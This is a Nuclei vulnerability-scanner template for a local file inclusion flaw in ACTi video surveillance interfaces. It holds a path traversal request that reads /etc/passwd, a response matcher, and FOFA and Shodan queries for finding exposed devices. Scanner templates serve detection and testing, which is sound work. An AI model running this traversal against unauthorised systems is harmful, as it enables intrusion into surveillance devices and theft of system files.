nuclei-templates/http/vulnerabilities/other/acti-video-lfi.yaml

38 lines
805 B
YAML

id: acti-video-lfi
info:
name: ACTi-Video Monitoring - Local File Inclusion
author: DhiyaneshDk
severity: high
description: |
ACTI video surveillance has loopholes in reading any files
reference:
- https://www.cnblogs.com/hmesed/p/16292252.html
metadata:
max-request: 1
verified: true
fofa-query: app="ACTi-视频监控"
shodan-query: title:"Web Configurator"
tags: acti,lfi,iot,video,monitoring
http:
- method: GET
path:
- "{{BaseURL}}/images/../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200